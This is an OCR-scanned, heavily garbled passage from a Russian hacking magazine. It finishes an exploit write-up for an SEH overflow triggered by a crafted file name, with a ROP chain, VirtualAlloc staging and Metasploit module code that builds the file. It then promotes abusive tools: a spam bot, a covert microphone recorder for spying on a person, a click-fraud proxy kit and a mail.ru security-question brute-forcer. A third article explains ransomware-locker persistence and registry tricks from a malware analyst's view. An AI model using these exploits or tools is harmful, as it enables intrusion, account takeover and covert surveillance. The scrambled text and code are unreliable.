из файла. После перезаписи БЕН у нас остается в стеке ровно 
508 байт! Сюда поместится РОП-программа или шеллкод, но и то 
и то вместе не поместится. СогеІапсобЗг сделал РОП-программу 
+ едд-бипіег-шеллкод (он маленький и помещается после РОП- 
программы в оставшийся объем, но он работает до-о-олго, пока 
ищет в куче основной шеллкод по восьмибайтной метке). Я же 
мазохист, и мне интересно мгновенное срабатывание шеллкода. 
Покопавшись по содержимому стека, я увидел следующее: в стеке 
до БЕН байт 100. В стеке по определенному смещению содер- 
жится указатель на кучу, на результат конкатенации пути + имени 
файла. Причем, если в стеке у нас начало имени файла попорче- 
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Начало атаки и РОП-програллма 1 




теіаріо'гі-строка и рѵеііпсіасісіг помогают сразу же опре- 
делить, какие байты перезаписывают 5ЕН 




Часть имени файла перезаписывает 
данные из стека 
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КУЧА 



|Н*1койЬ 2 



путь и имя файла на 
.МММ файла, 
обрезанные по длинно 



■ кучу 
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К в. І^ІПФЯМЧМ ЩЯМІЧІД 1, 
ГіМТЧр«Й ДиіГ№П№1НММОЙ 
р Другу» СІрАечИ-Цу [с ШЬПЛНОД вМ 2 ) 

9. В*!П^ЛНЯ»М шалллдд 2 



Схема работы эксплойта 



но, то в куче нет, тем не менее, длина также ограничена. 

Моя идея состояла в следующем: переписываем 5ЕН (УУУУ)- 
указателем на РОР-инструкцию для выравнивания указателя на 
стек так, чтобы Е5Р указывал не куда-то там, а точно на нашу 
РОР-программу из стека. То есть УУУУ должен указывать на РОР- 
гаджет, который меняет указатель Е5Р, а потом делает РЕТІМ, чтобы 
передать управление следующему РОР-гаджету и РОР-программе 
в целом. Для поиска гаджетов я использовал уже упомянутую при- 
мочку СогеІапсосІЗг'а. Все мои гаджеты из двух не поддерживающих 
АЗЬР библиотек — ЕТКРІ\І14І\І.сИІ и ЕТОІ51 4п.сИ1. Таким образом, я 
нашел гаджет Айй “Е5Р.4Е8 # РЕТІЧ 4” по адресу 0x20012026 (всегда 
постоянные, так как модуль не поддерживает А5ЕР). В результате 
после Ассезз Ѵіоіабоп программа переходила по этому адресу и 
меняла указатель стека, после чего он указывал в зону аааа...аааа. 
Таким образом, РЕТІЧ 4 передавала управление по адресу из аааа... 
аааа, поэтому туда я также добавил адреса, но уже с меньшим сдви- 
гом — АйИ Е5Р, 40 # РЕТІМ. В результате указатель стека рос, пока 
не попадал в зону 2222, где я и расположил РОП-программу. 

ВОР-программа 

РОР-программа представляет собой указатели на РОП-гаджеты, 
а также некоторые параметры. Главное ограничение — запрет на 
использование нулевых байт и размер. Так как шеллкод в стек не 
поместить, моя РОП-программа брала на сохраненный до аааа. ..аааа 
указатель на кучу, где хранится путь и имя файла, соединенные в 

ОДНу Строку: 

РРРР...РРРР/РРРРР...РРРаааа...ааааХХХХѴѴѴѴ222222... 



РРРР...РРРР 

РРРР...РРРР 

аааа...аааа 

УУУУ 

2222 



- путь 

- начало имени файла, через которое мы атакуем 

- КОР : 0x20012026 

- 5ЕН-КОР: 0x20012026 

- КОР-программа 



Примерно так. Замечу еще раз, что в стеке у нас поместилась 
только часть этого буфера: аааа...ааааХХХХУУУУ222222... именно ее 
мы используем для РОР-программы. Вышеупомянутый указатель 
указывает на ЕЕЕЕ, так что РОР-программа будет использовать най- 
денную кучу для того, чтобы записать в ЕЕЕЕ параметры для вызова 
ѴігІиаІАІІос. Чтобы выполнить шеллкод, нам надо сделать память 
исполняемой. Для этого годится, например, вызов ѴігІиаІРгоІесІ, 
который может менять флаги доступа на страницы памяти и может 
сделать ее исполняемой. Но в указанных библиотеках я не нашел 
вызовы этой функции, зато нашел вызовы Ѵі гІиаІАІІос, которая выде- 
ляет память, однако ее можно использовать для «перевыделения» 
памяти, задав при этом флаг доступа на исполнение, что позволит 
нам выполнить шеллкод из кучи. 

Сама функция ѴігІиаІАІІос находится в кегпе132.сІІІ, ее адрес не 
известен из-за А5ЕР, но так как ЬТОІЗІ 4п.сІІІ используют этот вызов, 
они сохраняют этот адрес в своей .баіа-секции, которая постоян- 
на, так как эти ДЛЛ-ки не поддерживают А5ЕР. В итоге по адресу 
0x1 РРАР1 60 хранится указатель на ѴігІиаІАІІос. Его я записал в ЕЕЕЕ- 
зону, так как там будет хранится небольшая РОП-программа номер 
два. РОП-программа «один» (22222) вычисляет нахождение РОП- 
«два» (ЕЕЕЕ), считает параметры, сохраняет так же в ЕЕЕЕ, после 
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Для эффективной проверки вставим на это место 
теіаэріоіі-строку 



чего меняет Е5Р на РРРРР, после чего исполняется Р0Р-«два», кото- 
рая делает РРРР исполняемой и передает управление куче, в самом 
конце РРРР. В конце РРРР- шелл код также не поместится, поэтому его 
я решил схоронить в РРРР... РРРР Таким образом, там можно поме- 
стить шеллкод размером до 750 байт, что достаточно для большин- 
ства задач. РРРР... РРРР можно условно разбить так: 



(2(2...(да 1112222333 34444ІЛІІЛІ...ІЛІІЛІ 3 3 3 3 3 3 ... 

(2(2Д)(2 - РОП- программа 2 

1111222233334444 - место для параметров ѴА, сюда пишет РОП 1 
ілі1лі...ілі1лі - вызов ѴА, передача управления на кучу дальше 

333333... - 5І:а§е 0 шеллкод, прыжок на РРРР...РРРР 




Наш эксплойт для работы в среде метасплойта готов! 



.. ыі *.т,і л г ■ И- - -Т-. ■ - - Г І 

■’ I ІР' ь -1 4 -1ЯР-Р 

_ -■■і" ^ Е 5 і = і 5 і ^ Н ^ Е і і Е 

і. ЕЕ=Е 

Ш-1ЁШІІІЯ 

Подозрительное место в формате МММ-файла 




Последняя часть нужна, так как выяснилось, что иногда РРРР лежит 
в другой странице памяти, поэтому ѴѴѴѴ..ѴѴѴѴ делает исполняемой 
только РРРР-часть, а РРРР — нет. Поэтому зіаде 0 шеллкод вычис- 
ляет по сдвигу РРРР, еще раз вызывает ѴА, делает уже страницу с 
РРРР исполняемой, после чего передает управление на шеллкод. Ну 
вот, с теорией и покончено. Как видно, написать эксплойт намного 
сложнее, чем найти дыру :). Теперь давай перейдем к самому экс- 
плойту, который я написал в виде модуля для Меіазріоіі;. 

Реализация эксплойта 

ааа_сІа1:а = ааа_беасІег # Заголовок МММ-файла 
ааа_сІа1:а << "\х00"*1680 
ааа_сІа1:а << ааа_1із1: 
ааа_сІа1:а << "\х00"*25 

#### Первая строка - путь к файлу 
ааа_сІа1:а << "С:\\ааа\\" 

# 7. Шеллкод из метасплойта 
ааа_сІа1:а << вііеіісосіе 

# Оставшееся место заполняем 

ааа_сІа1:а << "а"*(1:аг§е1:[ ' Бііе ' ] -вііеіісосіе. 1еп§1:Іі) 
ааа_сІа1:а << "а"*328 

# Разделитель 
ааа_сІа1:а << "\х00"*16 

#### Вторая строка - имя файла 

ааа_сІа1:а << "х"*320 

# 4. Тут начинается РОП-2 
ааа_сІа1:а << гор_§асІ§е1:52 

# 5. Тут 5І:а§е 0 шеллкод 
ааа_сІа1:а << 5Ііе11_дтр 
ааа_сІа1:а << "а"*61 

#### Продолжение имени файла, эта часть будет в стеке 



# триггер уязвимости 

# 2. КОР -гаджет: АРР Е5Р, 40 / КЕТМ 
ааа_сІа1:а << гор_з'тр*32 
ааа_сІа1:а << "а"*16 

# 1. БЕН, переписанный УУУУ 
ааа_сІа1:а << [1:аг§е1: . геѣ] . раск( 'V ) 

#3. РОП 1 - КЕТИ 

ааа_сІа1:а << гор_пор*10 

# 4. РОП 1 - программа 
ааа_сІа1:а << гор_§асІ§е1:5 
ааа_сІа1:а << "а"*31337 

Цифры в комментариях — порядок выполнения при атаке. Остальной 
код я не буду приводить в журнале — значительно проще взять гото- 
вый модуль с нашего диска и изучать напрямую его. 

Послесловие 

Как видишь, даже в условиях с ограничениями по размеру данных в 
стеке можно написать рабочий эксплойт, который обойдет все защи- 
ты. Можно было бы воспользоваться и вариантом едд-бипіег, но это 
сильно замедляет атаку. СогеІапсобЗг обещал придумать, как ускорить 
свой вариант эксплойта с едд-бипіег'ом :). Наш же вариант ограничен 
по размеру шеллкода в 750 байт, зато работает моментально. 

Если тебе интересна проактивная, агрессивная сторона безопас- 
ности и не только, ты хочешь поделиться своим опытом и набраться 
чужого, пообщаться с такими же, как и ты, то рекомендую принять 
участие в первой в России официальной ОЕРСОІМ-группе. Мы нахо- 
димся по адресу (Мсоп-гивзіа.ги . и проводим локальные мероприя- 
тия (пока только в Питере). На наших встречах будут мастер-классы 
по различным вопросам ИБ, включая и эксплойт-девелопмент, 
искусство поиска уязвимостей, вопросы ѴѴЕВ-безопасности, состяза- 
ния, пиво, общение и прочие составляющие того, без чего не может 
быть ни одной хакерсокой тусовки. Наша цель — создать локальный 
Ьаскегзрасе, который объединяет людей с общими интересами — ИТ, 
хакинг, программирование и т.д. Хочу сообщить, что в конце года мы 
поддержим создание первой в России, открытой, НЕЗАВИСИМОЙ и 
ДЕМОКРАТИЧНОЙ международной конференции по безопасности. 
Присоединяйся! т 
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взлом 



■ ■ Маг (іся 884888, зпіррег.ги) 




Программы 






Х-ТСЮІ.5 



Программа: ХМРгоху 
ОС: ѴѴіпсІоѵѵз 2000/ХР/2003 
5егѵег/ѴізІа/2008 $егѵег/7 
Автор: хЬидо 




Работаем с прокси 

ХМРгоху — это настоящий хакерский ком- 
байн, реализующий всевозможные задачи 
по работе с прокси. Данный набор утилит 
включает в себя такие полезные программы, 
как чекер, граббер, кликер.деоіри сорти- 
ровщик. 

Расскажу подробней о каждой из программ. 

• Чекер предназначен для проверки прокси- 
ков на валидность и включает в себя несколько 
окон и разделов. Работаетон абсолютнотради- 
ционно: позволяетзагружать списки прокси- 
серверов, чекает их в многопоточном режиме 

и сортирует сервера на «хорошие» и «плохие», 
позволяя удобно экспортировать результаты 
работы. 

• Граббер позволяет собирать списки прокси 
с различных сайтов: можно удобно доба- 
вить целую кучу сайтов, импортировав их из 
текстового файла. Все сграбленные прокси 
можно будет автоматически использовать 
для их проверки, что оченьудобно. 

• Кликер — это, как ясно из названия, про- 
стенький накрутчиксчетчиков и всевозможных 
клик-клубов. Работает в несколько потоков, 
заходя на сайты из списка через прокси-листы. 

• СеоІР — удобная тулза для разбиения 
проксиков по странам. Ведетлог, в котором 
выводятся строки вида «ргоху:рогі - страна». 

• Сортировщик предназначен для быстрого 
изменения формата записи информации о 



проксиках: например, замена проксей вида 

XXX. XXX. XXX. XXX ; XXX НЭ ХХХ.ХХХ.ХХХ.ХХХ:ХХХ. 

Кроме этого, он умеет удал ять дубли. 

Как видно из приведенного описания 
функционала, ХМРгоху может сослужить тебе 
отличную службу в самых разнообразных 
областях Х-деятельности. 

Программа: Ргоху5оск$ОгаЬЬег 
ОС: *піх/ѵѵіп 
Автор: ОІуиК 




Прокси-граббер на Питоне 

В качестве противовеса предыдущему 
комбайну хочу представитьтебе маленький, 
но крайне полезный граббер проксиков и 
соксов, написанный на питоне. Источником 
для граббинга нужного нам стаффа выступает 
известный сервис зруз.ги, на котором все ір 
выложены в чистом виде, а порты зашифрова- 
ны іаѵазсгірСом. На данном сайте происходит 
очень частое обновление списков прокси, 
которые, как правило, забираются интересую- 
щимися людьми лишь с первой страницы, наш 
же граббер пробегает по всем семи. 
Скриптимеетдва режима работы: 

1. Забираем ргоху (дгаЬЬег.руФО); 

2. Забираем зоскз (дгаЬЬег.ру-1: 1). 

Результаты граббинга можно выводить 
прямиком в нужный файл с помощью пара- 
метра '-Г. При запуске без параметров скрипт 
отрабатывает с установленными по умолчанию 
значениями. 

В качестве бонуса можно отметить тот факт, что 



вся логика граббера оформлена в виде простой 
функции, которую ты легко сможешь использо- 
вать в своих проектах. 

Программа: Наск РесогсІ Воок 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 $егѵег/7 
Автор: Кгопиз апсі 5ѵеі 



— 




Списываем текстовые файлы в 
утиль 



Многие из нас хранят всю свою добытую кровью 
и потом информацию в целой куче разрознен- 
ныхтекстовых файлов. Зачастую поиск в них 
нужной 50І_-инъекции или любой другой най- 
деннойтобойуязвимости (особенно, если она 
была обнаружена п-ное количество месяцев на- 
зад] можетзанять большое количество времени. 
Настала пора исправить это недоразумение! 
Представляютвоему вниманию прогу Наск 
ПесогсІ Воок — удобную записную книгу для 
хранения и каталогизации найденных на сайтах 
уязвимостей. 

Функционал и особенности тулзы: 

• сохранение ссылок, описаний и даты нахож- 
дения уязвимостей; 

• сохранениеТИЦ и РП (с возможностью их 
автоматического парсинга); 

• возможность добавлен ия личных заметок по 
текущему сайту; 

• редактирование и удаление любых записей; 

• сортировка записей по любому полю; 

• удобный поискпо базе; 

• ПИНГ Любых ССЫЛОК; 

• горячие клавиши; 

• вывод количества записей в зіаіиз Ьаг; 

• шифрование хранимой в БД информации 
(шифруются игі и поле тоге); 
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• подсветка НТТР ответов ссылокс разграниче- 
нием категорий по цветам; 

• сі гад & сі гор для загрузки файла; 

• множество настроек интерфейса взеШпдз.іпі; 

• хранение данных в БСП-іІе; 

• работаетна .ЫЕТ 3.5. 

Особо стоит отметить простоту работы с зашиф- 
рованными базами: 

1. В поле«КЕѴ» вводим ключ для шифрования; 

2. Выбираем файл .бЬ с нужной базой; 

3. Если был введен правильный ключ, то данные 
расшифруются верно, и ты сможешь работать 

с нужной базой, иначе — экран будет пустым. 
Автор программы с удовольствием выслушает 
любыетвои предложения и пожелания втопике 
ЬіЕІѵ/іРехрН . 

Программа: ѴК Ѵісіео Браттег 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор: ІІсІоп 




Спамим видео во «В Контакте» 

На очереди еще один вкусный софт для работы 
с известной социальной сетью. Итак, как видно 
из названия, ѴК Ѵісіео Браттег — это специа- 
лизированный софт для спама в видеокоммен- 
тариях во «В Контакте». Особенности утилиты 
достаточно интересны: 

• комментирование до 50 видео на одном 
аккаунте; 

• комментирование до 50 видео у каждого 
друга этого аккаунта; 

• граббинг количества приложений; 

• граббинг количества видео; 

• граббинг количества друзей; 

• граббинг количества кумиров; 

• граббинг количества групп; 

• двойная атака на антиспам-модуль в 
контакте (добавление заданных слов в 
конец и начало твоего текста); 

• регулирование задержки постинга; 

• многопоточность; 

• поддержка антикапчи. 

Кстати, данная программа является перепи- 
санной приватной версией «ѴК Комментатора», 
автор которого перестал работать над своим 
творением. 

Программа: Міс5ру++ 

ОС: ѴѴіпаоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: ЫідЫтаге 

Пришло время для замечательной програм- 
мы, которая фактически не имеетаналогов и 
занимает почетное место в арсенале каждого 
уважающего себя пранкера. 




Шпионим за звуком 



Встречаем: микрофонный шпион Міс5ру++ от 
известного кодера ЫідЫтаге! 

Данная утилита предназначена для автомати- 
ческой записи в файл всего звука с микрофона 
и применяется в случаях, если тебе необходимо 
записать все происходящее рядом с компьюте- 
ром нужного человека. Данная утилита работа- 
ет в консоли и имееттри параметра: 

1. Папка, где будут сохраняться через опреде- 
ленный промежуток времени файлы с запися- 
ми (если такой папки не существует, она будет 
создана автоматически); 

2. Время записи одного файла в миллисекун- 
дах; 

3. Частота КНг конвертированного ѴѴМА-файла 
(рекомендуются значения 8, 1 6 или 32). 

Принцип работы шпиона достаточно прост: че- 
рез заданный промежуток времени (например, 
каждые 10 минут) в выбранной папке создается 
ѴѴМА-файл с названием 03.03.201 1 .1 7.1 7.1 7. 
ѵѵта (дата и время сохранения файла). Вес 
конечных файлов определяется по формуле: 
одна секунда = один килобайт (то есть 1 0 минут 
будут весить 600 Кб, полчаса — 1 ,8 Мб). 

Пример использования программы: 
«Міс5ру++.ехе С :\га псіот1 : оІсіег\ 1800000 16» 

— запись всего звука через микрофон каждые 
полчаса в новый файл. 

Используемые в данном примере параметры: 

С : \гапсІоптРо1сІег\ - любая папка для 
записей; 

1800000 - полчаса в миллисекундах; 

16 - оптимальное сжатие ІлІМА в КН г. 



Все свои предложения и пожелания ты можешь 
оставить втопике ЫЫѵ/]п2д7Е 



Программа: [таіі.ги] Оиезгіоп 
Вгиіе 

ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 $егѵег/7 
Автор: 2еаІ. 




Брутим ответы на секретные 
вопросы 



На очереди специализированная программа 
для массового подбора ответов к секретным 
вопросам на ящиках почтового сервиса плаіі. 

ш. 

Функционал программы: 

• полностью синхронизированная многопо- 
точность; 

• работает через т. таіі.ги (быстрота, 
стабильность) ; 

• встроенный генератор зоигсе-файла; 

• встроенный чекер прокси; 

• анализатор валидности списка зоигсе; 

• анализатор действий при блокировании 
со стороны таіі.ги; 

• анализатор ошибок; 

• полное логирование. 

Надо заметить, что на данный момент это 
единственный рабочий брутфорсдля секрет- 
ных вопросов таіі.ги . 

Программа: [таіі.ги] Оиезгіоп 

ОС: ѴѴЫоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор: 2еаІ. 




Чекаем секретные вопросы 

Еще одна утилита оттого же автора, на этот 
раз предназначенная для массовой про- 
верки и сохранения секретных вопросов на 
аккаунтах. 

Подходит для тех, кто любит получать до- 
ступ к мэйлам, где в качестве ответа на 
секретный вопрос стоит что-то вроде «123», 
«дѵѵегіу» и т.д. Особенности чекера такие 
же, как и у предыдущей программы, отметим 
лишь различия: 

• работа без прокси; 

• встроенный парсер логов (может 
фильтровать логи на любой вид 
вопроса, чистить или находить 
нестандартные вопросы); 

• написан на движке брута ([таіі.ги] 
риеБііоп Вгиіе 1.04). 

Данный чекер удобно использовать вкупе с 
представленным выше мэйл-брутером, т 
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МАІЛЛ/АРЕ 



■ ■ сіееопіз ((ІееопізШдтаіІ.сот) 





КАК РАБОТАЮТ 
ВИШІОКЕРЫ? 

Чтобы узнать большие, отправь весь текст этой 
статьи на коротким номер 

о Каждый из нас сталкивался со всяческими СМС-блокерами, если 
не у себя на компьютере, то на машинах друзей. Такие штуки трудно 
назвать вирусами, но они тоже доставляют немало хлопот. Сегодня 
мы попробуем изучить приемчики кибер-мошенников, которыми они 
пользуются для отъема у населения честно заработанных денег. 



Закрепление в системе 

Представим, что злая малварь уже проникла в систему. 

Наивный пользователь скачал и запустил вредоносный 
ехе’шник, который в первую очередь должен обеспечить себе 
«нормальную» работу. Для этого программа должна прописать 
себя в автозагрузку вместе с ѴѴіпсІоѵѵз. Многие прекрасно знают, 



что и где отвечает за запуск программ сразу после старта 
нашей любимой ОС, но я все-таки еще раз перечислю возмож- 
ные варианты. 

Существуют три основных места для авторана: системный 
реестр, системные файлы со списком загружаемых программ и 
специальные папки автозагрузки. Начнем в обратном порядке. 
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БОРЬБА С АНТИВИРУСАМИ 

К счастью, СМ С- блоке рам противостоят доблестные антиви- 
русные компании, которые неустанно трудятся наддобавле- 
нием сигнатур зловредов в свои базы. Это очень раздражает 
вирусописателей, ведь из-за этого они теряют свои деньги. 
Поэтому некоторые экземпляры малварь-индустрии пытаются 
отключить или затруднить работу а веров. Мы подробно писали 
об этом в наших краш-тестах, поэтому — смело поднимай под- 
шивку «Хакеров» и наслаждайся. 

Папки автозагрузки известны любому пользователю. Все их 
содержимое можно увидеть в главном меню ѴѴіпсІоѵѵз, физиче- 
ски же они располагаются в профилях пользователей, напри- 
мер, С : \0оситеігЬ5 а псі 5е1;1;іп§5\асІтіп\Главное меню\ 
Программы\Автозагрузка\. Разумеется, вместо абтіп, можно 
подставить «АН ІІзегз или Ое^аиИ; ІІзег». 

В папки автозагрузки можно поместить как сам исполняемый 
файл, например, с помощью АРІ-функции СоруРіІе, так и ярлык 
на него. 

Всяческие вредоносные штуки редко используют это место 
для своего запуска, поскольку даже малоопытные юзеры могут 
обнаружить посторонние файлы в этих директориях. Тем не 
менее, как дополнительная гарантия своего успешного старта 
это место вполне сгодиться, так что не следует обходить его 
стороной при поиске малвари на зараженном компьютере. 
Системные файлы со списком загружаемых программ доста- 
лись в наследство современным ОС ѴѴіпсІоѵѵз еще от их 
9х-родственниц — 98-й и 95-й винды. Первый такой файл — это 
ѵѵіп.іпі, в котором есть секция [ѵѵіпсІоѵѵз], которая, в свою оче- 
редь, может содержать запись «гип=запускаемая_программа». 
Также существует файл и к зузіет.іпі, в секции [бгіѵег32] которого 
надо проверить наличие параметра вида «название_драйвера. 
уникальное_имя=путь_к драйверу». Здесь зловреды уже любят 
следить гораздо больше, чем в папках автозагрузки. 

Но лидером среди самых популярных мест для авторана являет- 
ся реестр ѴѴі псіоѵѵз. 

Помимо всем известных ключей НКЕѴ_СІІККЕІ\ІТ_ІІ5ЕК\ 
5о-р-Ьи/апе\Міспо5оТ1:\1лІіпсІо^5\СиппеігЬѴеп5Іоп\Кип\ и 
НКЕУ_ЮСАІ_МАСНІМЕ\5оТ-1;и/апе\Міспо50-Р-1;\1лІіпсІои/5\ 
Сиггеп-ЬѴег5Іоп\Кип\ с их братьями для одноразового запу- 
ска ПипОпсе, существует еще множество всяких веток рее- 
стра, из которых может стартовать программа. Например, 
если ты пользуешься ІЕ, и он вдруг начал вести себя странно 
(показывает голых тетенек или открывает странные сайты), 



ВЯЧЕСЛАВ ЗАКОРЖЕВСКИИ, 

ЗЕШОК МАШКЕ АМІ.Ѵ5Т. 

НЕІШІ5ТІС ВЕТЕСТКМ 6ШВ КА5РЕК5КѴ І.АВ. 
ПОСТОЯННЫЙ АВТОР ЖУРНАЛА «ХАКЕР». 

Семейство винлокеров или, по-другому, 
блокеров, развивалось очень динамично 
на протяжении последних полутора-двух 
лет. Если изначально они представляли 
собой отдельные попытки легкого за- 
работка денег, то сейчас все это превра- 
тилось в промышленно налаженный биз- 
нес. Самые первые версии блокеров были 
написаны крайне примитивно, обычно, 
на языках Ѵізиаі Вазіс или ОеІрЫ. Восстановить работу ѴѴіпбоѵѵз 
можно было при помощи несложных манипуляций или исполь- 
зования специальных сочетаний клавиш. Сейчас же индустрия 
блокеров настолько эволюционировала, что файлы крайне 
редко ходят в «чистом виде» — как правило, они защищаются с 
помощью специальных крипторов/протекоров, которые также ис- 
пользуются для распространения вредоносных программ. Сама 
«начинка», естественно, не стояла на месте — в настоящее время 
применяются такие методы блокировки системы, что восстано- 
вить ее работоспособность можнотолько используя сторонние 
утилиты. Также я встречал блокер, который переписывал МВВ 
жесткого диска и при загрузке выводил типичное сообщение об 
оплате своих «услуг» на черном экране загрузки. Вот до чего до- 
ходят разработчики, чтобы только заполучить прибыль. 

то стоит заглянуть сюда: РІКЕУ_СикКЕМТ_ІІ5ЕК\5о-р'1:і\/аге\ 
Міспо50-р-1;\1лІіпсІои/5\СиппеігІ;Ѵег5Іоп\Ехр1опеп\Впои/5еп 
Неірег 0Ь]ес*5\. Еще есть НКЕУ_ЮСАІ_МАСНІМЕ\5о-Е-1;и/апе\ 
Місго5оТ-Ь\МіпсІсил/5 МТ\СиппеігбѴеп5Іоп\1лІіп1о§оп\ 
ІІзегіпііД, НКЕУ_ЮСАІ_МАСНІМЕ\50РТ1 ліАКЕ\Місгобо-Р-і:\ 
1лІіпсІо^5\СиппеігІ;Ѵеп5Іоп\Кип5епѵісе5\, НКЕУ_І_ОСАІ__ 
МАСНІМЕ\Бо-р-1;и/апе\Міспо50-р-1;\1лІіпс1ои/5 І\ІТ\Сиггеп1:Ѵег5Іоп\ 
Міп1о§оп\І\Іо-1:і-Еу\. Эти ветки реестра позволяют запустить 
разнообразные исполняемые файлы (обычные ехе, программы, 
сервисы или 611). 

Кстати, последний ключик подгружает пользовательскую 611 к 
ехріогег.ехе, а это значит, что код зловреда будет работать даже 
в Баі'е Мобе. 

Следует обратить внимание и на НКЕУ_І_ОСАІ__МАСНІІ\ІЕ\ 
50РТ1лІАКЕ\Міспозо-Е'1;\1лІіпбои/5 МТ\Сиппеп1:Ѵеп5Іоп\Іта§е 
Рііе ЕхесиНоп 0р1;іоп5\Имя_прогаммы\ — при запуске 
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Имя_прогаммы будет запускаться софт, указанный в строковом 
параметре ОеЬиддег. Иная хитрая малварь может использовать 
ассоциации файлов в реестре. То есть, при запуске, например, 
Іхі-файла, будет стартовать сначала вредоносное ПО, которое 
уже потом будет запускать реальную программу, работающую 
с этим типом файлов. Также вирус может загрузиться в память 
компьютера с помощью групповых политик. За это отвечает 
ключ НКЕУ_ЮСАІ_МАСНІМЕ\50РТ1ліАРЕ\Місгобо-Р1:\ілііпсіом 5\ 
Сиппеп1:Ѵеп5Іоп\ро1ісіе5\Ехр1опеп\Кип, в котором содер- 
жатся параметры с путями запускаемых программ. 

Вообще, мест, откуда может стартовать проникший на компью- 
тер СМС-блокер или другая зараза, много, но проверить их 
достаточно просто (если не применяются специальные техники 
маскировки), особенно если использовать специализированные 
средства, например, утилиту НиаскТЫз. 

Оборонительные редуты 

После того, как малварь прописала себя в автозагрузку, ей 
следует позаботиться о своей сохранности: пользователь не 
должен завершить процесс зловреда, удалить программу из 
авторана и прочее. Для этого проще всего использовать все те 
же политики безопасности ѴѴіпбоѵѵз. 

Надо сказать, что фрауд-антивирусы, которые больше ориенти- 
рованы на запад, практически не пользуются такими трюками. То 
есть, если наш отечественный СМС-блокер может напрочь пара- 
лизовать работу компьютера, то англоязычная малварь такого 
не делает. Причина, скорее всего, в том, что в тех же Штатах 
законодательство к такого рода шалостям относится гораздо 
строже. Кроме того, местные жители не платят за электронные 
услуги эсэмэсками, для этого у них есть банковские карты, а, как 
известно, Ѵіза и МазІегСагб очень ревностно следят за поряд- 
ком среди своих клиентов. Одна гневная жалоба от доверчивого 
пользователя — и биллинг, проводящий процессинг платежей за 
Егаиб Апііѵігиз, может навсегда лишиться лицензии. 

Однако, мы отклонились от темы. Итак, что же делает типич- 
ный СМС-блокер для того, чтобы защитить себя от удаления? 
Первым делом, это — блокировка редактора реестра и диспет- 




і 



Борьба с блокерами от Касперского 

чера задач. Для этого надо подправить всего два параметра 
в ветке реестра НКЕѴ_СикКЕМТ^БЕК\Бо^і\/аге\Місго50-РТ\ 
1лІіпсІо^5\Сиппеп1:Ѵеп5Іоп\Ро1ісіе5\5у5І;ет. 

Первый из них — ОізаЫеПедізІгуТооІз. Если присвоить ему 
значение равное 1, то гедебіСехе не захочет запускаться. Еще 
стоит обратить внимание на параметр ОізаЫеРедесІіІ, который 
может находиться помимо НКСІІ-секции еще и тут — 
НКІМ\$о-Р1;и/апе\Міспо50-Р1;\1лІіпсІо^5\СиппеігбѴеп5Іоп\Ро1ісіе5\ 
Бузует. Для запрета запуска «Диспетчера задач» используется 
параметр ОізаЫеТазкМдг в НКСУ\5о^:і\/аге\Місго50^:\МіпсІоі\/5\ 
СиппеігЬѴепБІопХРоІісіеБХБуБ'Ьепі. Разумеется, малварь может 
запретить запуск определенных программ. Делается это опять-таки 
через политики безопасности. Если ключ НКЕѴ_СІІККЕІ\ІТ_ІІБЕК\ 
Бо-р-Ыа г е \М і с по 5 о-РІ: \іліі п сі омб \С и г г е ігС Ѵе г 5 і о п \ Ро 1 і с і е 5 \ 
Ехріопеп будет иметь параметр РезІгісіРип со значением равным 
единице, а также подключен РезІгісіРип, который содержит в себе 
список ехе-файлов, то пользователь сможет запустить только те 
программы, которые находятся в этом списке. 

Для черного списка следует использовать параметр и ключ 
Р іза ІІоѵѵР и п , благодаря которым запуск определенного ПО 
станет невозможен. Уже этот набор ограничений позволяет 
малвари достаточно хорошо защитить себя от посягательств на 
свою жизнь. Даже если пытаться пробовать запустить нестан- 
дартные средства для мониторинга процессов и редактирова- 
ния реестра, то и они могут быть заблокированы с помощью 
□ ізаІІоѵѵРип или РезІгісіРип. И это отнюдь не единственный 
способ помешать запуску чего-либо в инфицированной систе- 
ме! Например, зловред может переассоциировать запуск 
программ на себя, прописав собственное тельце в параме- 
тре по умолчанию для ключа НКЕУ_СІ_А55ЕБ_КООТ\ехеЯ1е\ 
5Ііе11\ореп\соттапс1. Или же поиграться с подключами в 
НКЕУ_ЮСАЕ_МАСНІМЕ\50РТ1ліАКЕ\Місго5О-Р-і:\1лііпсіом5 і\ІТ\ 
Сиггеп1:Ѵег5Іоп\Іта§е Рііе ЕхесіШіоп Ор-Ьіопз. Но, к сожа- 
лению, вышеперечисленными методами малварь не ограничи- 
вается. Создатели своего детища могут блокировать некоторые 
настройки рабочего стола, настройки отображения файлов в 
проводнике и прочее. Но это мы рассмотрим чуть ниже, вместе 
с нарушением работоспособности интернета, поскольку все эти 
трюки служат больше для запугивания пользователя, нежели 
для защиты зловреда. 

Воздействие на пользователя 

Самая главная задача мошеннического ПО — это выманить у 
пользователя определенную сумму денег. Задачу эту в какой-то 
степени можно назвать даже творческой — надо так испугать 
юзера, чтобы он, не сильно сожалея о своих кровных, отпра- 
вил СМС и при этом не решил самостоятельно избавится от 
малвари. Поэтому разработчики зловредов включают свою 
фантазию на полную катушку. Самый банальный и распростра- 
ненный прием для влияния на пользователя — это неубиваемое 
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Гламурненький СМС-блокер 

окно. Его нельзя закрыть, нельзя свернуть, оно висит поверх 
всех остальных окон на десктопе, а в некоторых случаях оно 
даже монопольно владеет фокусом ввода. Достигнуть такого 
эффекта совсем несложно, причем используя стандартные 
средства ѴѴіпсіоѵѵб. АРІ-функция СгеаІеѴѴіпсІоѵѵЕх, отвечающая 
за создание окон, имеет множество параметров, среди которых 
сІѵѵЕхЗіуІе и сІѵѵЗіуІе, позволяющие программистам-мошенникам 
добиться нужного эффекта. Например, передав функции в 
качестве первого аргумента значение ѴѴ5_ЕХ_Т0РМ05Т, мы 
заставим окно отображаться всегда поверх всех остальных 
окон, не имеющих этого атрибута, а поиграв сІѵѵЗіуІе можно 
получить отсутствие всяческих контролов в заголовке окна или 
даже вообще избавиться от этого заголовка. 

Для того чтобы окно СМС-блокера нельзя было закрыть, обычно 
перехватывают сообщение ѴѴМ_СІ_05Е, из обработчика которого 
убирается стандартный код закрытия окна. Вообще, с помо- 
щью этих сообщений можно сделать много интересных вещей. 
